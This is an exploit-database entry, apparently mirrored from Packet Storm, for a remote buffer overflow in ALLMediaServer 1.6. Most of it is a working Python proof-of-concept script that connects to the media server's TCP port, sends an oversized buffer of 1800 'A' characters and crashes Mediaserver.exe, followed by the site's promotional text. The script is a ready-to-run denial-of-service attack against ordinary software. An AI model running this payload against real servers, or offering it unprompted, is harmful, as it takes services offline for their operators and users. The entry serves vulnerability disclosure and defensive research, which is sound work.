Lucene search
K

ALLMediaServer 1.6 Remote Buffer Overflow

🗓️ 26 Mar 2022 00:00:00Reported by Yehia ElghalyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 86 Views

ALLMediaServer 1.6 Remote Buffer Overflow discovered by Yehia Elghaly and tested on Windows 7 x86 - Windows 10 x64. Vulnerability causes Mediaserver.exe to crash remotely

Code
`# Exploit Title: ALLMediaServer 1.6 Remote Buffer Overflow  
# Discovered by: Yehia Elghaly  
# Discovered Date: 2022-03-25  
# Vendor Homepage: https://www.allmediaserver.org/  
# Software Link : https://www.allmediaserver.org/LiveUpdate/ALLMediaServer.exe  
# Tested Version: 1.6  
# Vulnerability Type: Buffer Overflow (DoS) Remote  
# Tested on OS: Windows 7 x86 - Windows 10 x64  
  
# Description: ALLMediaServer 1.6 Remote Buffer Overflow  
  
# Steps to reproduce:  
# 1. - ALLMediaServer 1.6 listening on port 888 or can be changed to 878  
# 2. - Run the Script from remote TCP/IP  
# 3. - Mediaserver.exe Crashed  
  
  
import socket  
  
print("######################################################")  
print("# ALLMediaServer 1.6 Remote (BUffer Overflow) #")  
print("# -------------------------- #")  
print("# BY Yehia Elghaly #")  
print("######################################################")  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
try:  
s.connect(('192.168.1.99', 878))  
evilbuffer = "A" *1800  
s.sendall(evilbuffer)  
data = s.recv(1024)  
s.close()  
print "Media is Out"  
except socket.error, msg:  
print ""  
print "Couldnt connect with Mediaserver - Crashed"  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Mar 2022 00:00Current
1.1Low risk
Vulners AI Score1.1
86